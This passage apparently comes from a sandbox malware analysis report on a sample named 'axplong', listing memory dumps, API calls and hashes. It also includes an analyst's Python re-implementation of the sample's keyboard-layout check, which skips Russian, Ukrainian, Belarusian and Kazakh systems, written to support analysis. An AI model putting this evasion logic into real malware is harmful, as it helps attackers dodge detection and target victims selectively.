• Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmp
                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                  • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                                                  • API String ID: 47109696-3963862150
                                                                                                                                                                  • Opcode ID: 269c47d727b5768ddda5b3cecbdc4e4725a083870faa83f38ee6e70b0c71f472
                                                                                                                                                                  • Instruction ID: fd0ff04d0adca4e790df46938a29dfdff96f9e05e85384fe7ce61002de394466
                                                                                                                                                                  • Opcode Fuzzy Hash: 269c47d727b5768ddda5b3cecbdc4e4725a083870faa83f38ee6e70b0c71f472
                                                                                                                                                                  • Instruction Fuzzy Hash: 6F02B271900228ABEB24DF54CC89BDEB779EF04304F5042E9E509A7691DB74ABC5CFA1
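The function above carries the strings "Keyboard Layout\Preload", "00000419", "00000422", "00000423" and "0000043f", opens a key with RegOpenKeyExA (samDesired = 0x1, KEY_QUERY_VALUE) and walks it with RegEnumValueW. Those four values are Windows keyboard-layout IDs whose low word is the language ID: 0x0419 Russian, 0x0422 Ukrainian, 0x0423 Belarusian, 0x043F Kazakh, the usual list for a CIS-locale exclusion check. The following is an added example written for this page (an analyst's re-implementation, not code from the sample or from Joe Sandbox) that reproduces the check so a sandbox operator can see what the routine sees. The registry path and the four KLIDs come from the report; the function and constant names are mine; that the sample does a literal string compare is an assumption (the report shows the strings, not the compare), so the example offers both a literal compare and a language-ID compare and shows where they differ.

```python
# Analyst's re-implementation of the locale check implied by the strings in the
# routine at c25c60 (added example; not the sample's code, not Joe Sandbox output).
# Taken from the report: key "Keyboard Layout\Preload" under HKCU, opened with
# KEY_QUERY_VALUE and enumerated; KLIDs 00000419/00000422/00000423/0000043f.
# Assumed (not shown in the report): how the enumerated values are compared.
import re

# KLIDs from the function's string table, exactly as printed in the report.
SAMPLE_KLIDS = frozenset({"00000419", "00000422", "00000423", "0000043f"})

# Language IDs (low 16 bits of a KLID). Standard Windows LCID values.
LANGID_NAMES = {0x0419: "ru", 0x0422: "uk", 0x0423: "be", 0x043F: "kk"}

_KLID_RE = re.compile(r"^[0-9a-fA-F]{8}$")


def klid_langid(klid: str) -> int:
    """A Preload value is an 8-hex-digit KLID. Its low word is the language ID;
    the high word carries layout-variant flags (e.g. 'd001' marks a substituted
    layout), so 'd0010419' is still a Russian layout."""
    if not _KLID_RE.match(klid):
        raise ValueError(f"not a KLID: {klid!r}")
    return int(klid, 16) & 0xFFFF


def matching_layouts(preload_values, exact: bool = True):
    """Return the Preload values that hit the sample's list.

    exact=True  : literal, case-insensitive compare against the four KLIDs
                  (assumption about the sample's behaviour).
    exact=False : compare the language ID instead, which also catches variant
                  KLIDs such as 'd0010419' that a literal compare misses.
    """
    wanted_langids = {klid_langid(k) for k in SAMPLE_KLIDS}
    hits = []
    for raw in preload_values:
        value = raw.strip().lower()
        if exact:
            if value in SAMPLE_KLIDS:
                hits.append(value)
        elif _KLID_RE.match(value) and klid_langid(value) in wanted_langids:
            hits.append(value)
    return hits


def would_abort(preload_values, exact: bool = True) -> bool:
    """Decision a CIS-avoidance check makes: any matching layout -> stop running."""
    return bool(matching_layouts(preload_values, exact))


def read_preload_from_registry():
    """Read HKCU\\Keyboard Layout\\Preload the way the API calls in the report
    suggest (open with query access, enumerate values). Windows only."""
    import winreg  # only available on Windows
    values = []
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Keyboard Layout\Preload",
                        0, winreg.KEY_QUERY_VALUE) as key:
        _subkeys, value_count, _mtime = winreg.QueryInfoKey(key)
        for i in range(value_count):
            _name, data, _kind = winreg.EnumValue(key, i)
            values.append(str(data))
    return values


if __name__ == "__main__":
    # Constructed sample inputs; not data taken from the analysed machine.
    cases = {
        "en_only": ["00000409"],
        "en_plus_ru": ["00000409", "00000419"],
        "en_plus_ru_variant": ["00000409", "d0010419"],
    }
    for name, preload in cases.items():
        print(f"{name:20s} literal={would_abort(preload)!s:5s} "
              f"by_langid={would_abort(preload, exact=False)}")
```

On a Windows analysis host, `would_abort(read_preload_from_registry())` tells you whether the guest's preloaded layouts would trip a literal check of this kind; the `exact=False` path shows that a guest configured with a substituted or IME variant of a Russian layout is still a Russian locale even though the four literal strings never match it.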

Control-flow Graph (rendered graph omitted; only the information recoverable from the graph data is kept)
• Function entry c27d00, basic blocks c27d00-c282a6
• Calls: c54020, c37870 and c25b20 (called as a pair, repeatedly), c25c60 (the Keyboard Layout\Preload routine listed above; three call sites in block c27fe9-c281e5), c25640 (three call sites), GetNativeSystemInfo (c27ea3), c58a81, c3d593, c3cf21, c56b9a
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 00C27EA3
                                                                                                                                                                  • API ID: InfoNativeSystem
                                                                                                                                                                  • String ID: JmpxQb==$JmpxRL==$JmpyPb==
                                                                                                                                                                  • API String ID: 1721193555-2057465332
                                                                                                                                                                  • Opcode ID: a774452a94ec166da818ced94e58d91b346068a8394f7944d3280df6cb0fc8f7
                                                                                                                                                                  • Instruction ID: 81911790aea70a58bc3919e1fe33e7d781b816e9271e3d2cdb2d180d3dc2f4bc
                                                                                                                                                                  • Opcode Fuzzy Hash: a774452a94ec166da818ced94e58d91b346068a8394f7944d3280df6cb0fc8f7
                                                                                                                                                                  • Instruction Fuzzy Hash: 38D12970E00664DBDF24BB28EC4A3AD7771AB45324F50429CE415AB7D2DB358F8497D2

Control-flow Graph (rendered graph omitted; only the information recoverable from the graph data is kept)
• Function entry c27560, basic blocks c27560-c27770
• Calls: Sleep (c2759c), c3d041, c3d57e, c3cff7, c37f30 (x3), CreateThread (c2768e), Sleep (c27699), c3d593, c56b9a
                                                                                                                                                                  APIs
                                                                                                                                                                  • Sleep.KERNEL32(00000064,1A1F2CD4,?,00000000,00C68FB8,000000FF), ref: 00C2759C
                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00C27400,00C88608,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00C2768E
                                                                                                                                                                  • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C27699
                                                                                                                                                                    • Part of subcall function 00C3CFF7: RtlWakeAllConditionVariable.NTDLL ref: 00C3D0AB
                                                                                                                                                                  • API ID: Sleep$ConditionCreateThreadVariableWake
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 79123409-0
                                                                                                                                                                  • Opcode ID: 0431d81f2d5621dbb4fbc249a1c2dde761ac164f423e30b4b02a831f13bc333e
                                                                                                                                                                  • Instruction ID: 0d89c9d91eb55a177cf43abcaf09ef6b4f4e8d41b90bd4812d3efeafb8314a93
                                                                                                                                                                  • Opcode Fuzzy Hash: 0431d81f2d5621dbb4fbc249a1c2dde761ac164f423e30b4b02a831f13bc333e
                                                                                                                                                                  • Instruction Fuzzy Hash: 135127B0214208DBEB14DF28EDC5B8D3BA1EB48704F904229F8119BBD1DB79D9848F99

Control-flow Graph (rendered graph omitted; only the information recoverable from the graph data is kept)
• Function entry c56e01, basic blocks c56e01-c56f70
• Calls: GetFileType, c57177, c54020, GetFileInformationByHandle, c570c9, c56f71 (x3), c57096, c5740d, c57443, c3cf21
APIs
• GetFileType.KERNEL32(?,?,00000000,00000000), ref: 00C56E23
• GetFileInformationByHandle.KERNEL32(?,?), ref: 00C56E7D
• __dosmaperr.LIBCMT ref: 00C56F12
  • Part of subcall function 00C57177: __dosmaperr.LIBCMT ref: 00C571AC
Memory Dump Source
• Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
Yara matches
Similarity
• API ID: File__dosmaperr$HandleInformationType
• String ID:
• API String ID: 2531987475-0
• Opcode ID: d4802f6b50d684bd83607bf84b4c9922aee3d9958d4a8a6baed0958cc6ebc19e
• Instruction ID: fef3d51509343c5b606ccea2bb7894d0d1a51c92e03fe7d7cc8fd138c515a9bb
• Opcode Fuzzy Hash: d4802f6b50d684bd83607bf84b4c9922aee3d9958d4a8a6baed0958cc6ebc19e
• Instruction Fuzzy Hash: 10416079900304AFDB24DFB5E845AAFB7F9EF88301B50451DF856D3251EB30A988DB24

Control-flow Graph
• Function at 00C56C99 (basic blocks c56c99-c56d76); the rendered graph, which marks executed and not-executed blocks, is omitted here. Graph nodes reference CreateFileW and CloseHandle.
Memory Dump Source
• Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3e5ba1ce27ce486d1cdcd37ab0ad8dbe227a6b794cd70ec3ac7046fa9fcce5bc
• Instruction ID: 81592f2b7b89a07f14c3125b055438720f9171e9bb8c2bacb220a7345ff7800b
• Opcode Fuzzy Hash: 3e5ba1ce27ce486d1cdcd37ab0ad8dbe227a6b794cd70ec3ac7046fa9fcce5bc
• Instruction Fuzzy Hash: A6212876A052087AEB117B64AC42BAF37399F4133AF600710FD343B1D1DB705E89A6A9

Control-flow Graph
• Function at 00C282B0 (basic blocks c282b0-c284a1); the rendered graph, which marks executed and not-executed blocks, is omitted here. Graph nodes reference GetNativeSystemInfo.
APIs
• GetNativeSystemInfo.KERNEL32(?), ref: 00C28454
Memory Dump Source
• Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
Yara matches
Similarity
• API ID: InfoNativeSystem
• String ID:
• API String ID: 1721193555-0
• Opcode ID: a886f1702944049afa6e871b3ca0b786a464bc1f0a913f8537e2025503c80a88
• Instruction ID: 47c1fae07e53ae93bd1511607b4d4a94a58eb29e607bc457b5df35f998d678e1
• Opcode Fuzzy Hash: a886f1702944049afa6e871b3ca0b786a464bc1f0a913f8537e2025503c80a88
• Instruction Fuzzy Hash: 6C514970D012289BEB24FB28EC457EEB775DB45314F5042A8E809A76D1EF349E888B95

Control-flow Graph
• Function at 00C56F71 (basic blocks c56f71-c56ff7); the rendered graph, which marks executed and not-executed blocks, is omitted here. Graph nodes reference SystemTimeToTzSpecificLocalTime.
APIs
• SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00C56FB3
Memory Dump Source
• Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
Yara matches
Similarity
• API ID: Time$LocalSpecificSystem
• String ID:
• API String ID: 2574697306-0
• Opcode ID: 134f5b1e82656d721bfe36656746ce33f8b47493f4a805e7a1e543bd3adc92dc
• Instruction ID: 5789455f9eca52736e642bc9ebe90b80fad4d75bb354b281fb0d8d1b0d87b6b2
• Opcode Fuzzy Hash: 134f5b1e82656d721bfe36656746ce33f8b47493f4a805e7a1e543bd3adc92dc
• Instruction Fuzzy Hash: 9111D07690010CABDB10DED5D944EDFB7BC9B08315F505266E911E7180D770EF488B65

Control-flow Graph
• Function at 00C5AF0B (basic blocks c5af0b-c5af58); the rendered graph, which marks executed and not-executed blocks, is omitted here. Graph nodes reference RtlAllocateHeap.
APIs
• RtlAllocateHeap.NTDLL(00000000,1A1F2CD4,?,?,00C3D32C,1A1F2CD4,?,00C378FB,?,?,?,?,?,?,00C27435,?), ref: 00C5AF3D
Memory Dump Source
• Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: b07a4a61f56ee3378b059925ce01a9dfadbdacd5df8ccfcfedf043956abeec0e
• Instruction ID: 952eb49cd5420caf4aa3e99fbfaf597cba9f5feb5687313154cd64a60dd21556
• Opcode Fuzzy Hash: b07a4a61f56ee3378b059925ce01a9dfadbdacd5df8ccfcfedf043956abeec0e
• Instruction Fuzzy Hash: BAE02B7E20A1115BDB2032E76C0175E358C8F413B3F150351AC24A6081CF20DDC856FF
APIs
Memory Dump Source
• Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: ec96bdf9b012aceb955d2efeab912cca6d7655daec8441a0c86b3fb87eee7ab7
• Instruction ID: 1a3ed5ec09eb94a2187a51ef15ae1f7d4f959e1d1b416107c2ef8cee2f62f706
• Opcode Fuzzy Hash: ec96bdf9b012aceb955d2efeab912cca6d7655daec8441a0c86b3fb87eee7ab7
• Instruction Fuzzy Hash: ADF0A471E10618ABC710BB799D0BB1EBB75AB06B64F900358E811672E1DB345A009BD7
Memory Dump Source
• Source File: 00000006.00000002.3025816737.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4ef0000_axplong.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a9fa31e998c1ca24222d42d8bb8d99740caecae27257d989a3c1ef1ee81063d2
• Instruction ID: fb9ae49d0019ad3a7ac30c26acf661776edd186e3bc34eb39313abdff77e6af2
• Opcode Fuzzy Hash: a9fa31e998c1ca24222d42d8bb8d99740caecae27257d989a3c1ef1ee81063d2
• Instruction Fuzzy Hash: 491156E728E114BEE14256959F40AFB3B6EE7C33303309462F603CA643F2851A8D7131
Memory Dump Source
• Source File: 00000006.00000002.3025816737.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4ef0000_axplong.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 31d09367c8a41ba6e1a48b80e5979221a3671a6d920f08b76ad73b40750b64eb
• Instruction ID: d597852dab33c052a5f81ed22aad90ab06070f3f15a001d2f5f58598cc85b8ad
• Opcode Fuzzy Hash: 31d09367c8a41ba6e1a48b80e5979221a3671a6d920f08b76ad73b40750b64eb
• Instruction Fuzzy Hash: 2B11E5EB28E114BDE04251855F00AFA3A6EE3C33703309462F643DA643F2D91A4A3032
Memory Dump Source
• Source File: 00000006.00000002.3025816737.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4ef0000_axplong.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8c3a5df10aa232f4e6cca0b3e20aafb3a78c1e68013797fbc74bdad2a8727ced
• Instruction ID: ad321343049497bd84db370d27e175700fd960057ce4f0524100a4f75e35ae74
• Opcode Fuzzy Hash: 8c3a5df10aa232f4e6cca0b3e20aafb3a78c1e68013797fbc74bdad2a8727ced
• Instruction Fuzzy Hash: 391129E714E2D07EE24346805F549F73F6DEAC373033094ABFA42D9443E286194DA232
Memory Dump Source
• Source File: 00000006.00000002.3025816737.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4ef0000_axplong.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: df55895a31e140ba9855bfb515763e57ebd5a14eb181c1dc601fd23a97edf13e
• Instruction ID: d5ce33e0f25fa9ce259483366c584ddcb2c619665d07b9ae21f864575a91304e
• Opcode Fuzzy Hash: df55895a31e140ba9855bfb515763e57ebd5a14eb181c1dc601fd23a97edf13e
• Instruction Fuzzy Hash: 9F01C4EB249114BDB15255855F00AFB7A6EE3C3770730D562FA43DA503F2D91A8E7132
Memory Dump Source
• Source File: 00000006.00000002.3025816737.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4ef0000_axplong.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d368eebe6f68036f85cddd2a963726ab8899868e510558dd3cbecd5ae5ac5ae2
• Instruction ID: 6e8f06aac04101c70a9a263258f943549e0744ec8650814763bae18b4894c923
• Opcode Fuzzy Hash: d368eebe6f68036f85cddd2a963726ab8899868e510558dd3cbecd5ae5ac5ae2
• Instruction Fuzzy Hash: C501C4EB249114BDF15256859F04AFB7A6EE3C37303309562FA43D6903F29A1A4A3531
Memory Dump Source
• Source File: 00000006.00000002.3025816737.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4ef0000_axplong.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 84e95ffedcb10b9f5148371b895db9ec0b119abc71587d96cfd231c7208ce68c
• Instruction ID: 80eed5f69ee3bda829d91b5bc7716ebe46ba4c27112c7a85f587dfef704f160f
• Opcode Fuzzy Hash: 84e95ffedcb10b9f5148371b895db9ec0b119abc71587d96cfd231c7208ce68c
• Instruction Fuzzy Hash: 680180EB28E114BDE15255815F04AFA7A6EE3C37707309462FA43DA943F2991A8A3172
Memory Dump Source
• Source File: 00000006.00000002.3025816737.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4ef0000_axplong.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0748c06108ecf51ee0b28d846d156d40d7c315dea252df39ba5e6e772221c545
• Instruction ID: c6e77722029fe285b9eec736d6ba49c92e04a2a7dcbd99824151e7385b651f0e
• Opcode Fuzzy Hash: 0748c06108ecf51ee0b28d846d156d40d7c315dea252df39ba5e6e772221c545
• Instruction Fuzzy Hash: 6601D2EA24D114BEF14252815F10AFB3B6DE7C2730730D462FA43D6943F2951A8A3032
Memory Dump Source
• Source File: 00000006.00000002.3025816737.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4ef0000_axplong.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                  • Opcode ID: 7154f79c0309f9defa2ab798ebd5732645925e1cefcd855fc587b53de45815df
                                                                                                                                                                  • Instruction ID: a6e871d9c2d491f1e770cee48d669d40ce3784b743e44ee79ea589f7ceb6d958
                                                                                                                                                                  • Opcode Fuzzy Hash: 7154f79c0309f9defa2ab798ebd5732645925e1cefcd855fc587b53de45815df
                                                                                                                                                                  • Instruction Fuzzy Hash: 950176EB14D1503CF15181916F50BFB2B6ED2C37303309866F662C9543F28A0A8F3032
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3025816737.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_4ef0000_axplong.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 6e1bdbedac3590ccd103d7bb70eac6cd70546ba86ad1f15044cf394323b01d3e
                                                                                                                                                                  • Instruction ID: c443918e0d4318f6237066fb7bd21700958f59594c5e7b5793c0ff9061e3e271
                                                                                                                                                                  • Opcode Fuzzy Hash: 6e1bdbedac3590ccd103d7bb70eac6cd70546ba86ad1f15044cf394323b01d3e
                                                                                                                                                                  • Instruction Fuzzy Hash: 630126AB28E2906EF14291912F206F76B6EE6D3330330D876F542C5943F2891A8E6532
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3025816737.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_4ef0000_axplong.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: e21786e30370b737808f9fa8353aef6e255bd79063c27a2837e6953c8d64e857
                                                                                                                                                                  • Instruction ID: a9094aa8d0ac9dc76fb21c2422b09775f208246dd15af7ac448ea46d4fe15cca
                                                                                                                                                                  • Opcode Fuzzy Hash: e21786e30370b737808f9fa8353aef6e255bd79063c27a2837e6953c8d64e857
                                                                                                                                                                  • Instruction Fuzzy Hash: 42F0C2EB24D1507DB14191916F14AFB6B6ED1C3B30330D826F542D4902F2890A8E2032
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3025816737.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_4ef0000_axplong.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 1264c252b12c59b031de983d3a21b0b8db1f594b7f88df3ddbe7a3c532630d7b
                                                                                                                                                                  • Instruction ID: cff371d867c5717c0a25ec8da6271b894ce6bec96bb3e2bb9fc02483d3cf02c3
                                                                                                                                                                  • Opcode Fuzzy Hash: 1264c252b12c59b031de983d3a21b0b8db1f594b7f88df3ddbe7a3c532630d7b
                                                                                                                                                                  • Instruction Fuzzy Hash: B3E0D8EB28D1507EF09150C66F106FB6B2EE2C3730730D423F603D5903A2890A8E7532
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __floor_pentium4
                                                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                  • API String ID: 4168288129-2761157908
                                                                                                                                                                  • Opcode ID: fd94ec257c4ef1f8f79f991d1e00500fec44af56488bef84bd532ff6f6f00b4c
                                                                                                                                                                  • Instruction ID: 8e5facb346fc1b9805d67edbcc1cd86b19e51be10ab6bb3fa4d008890169640e
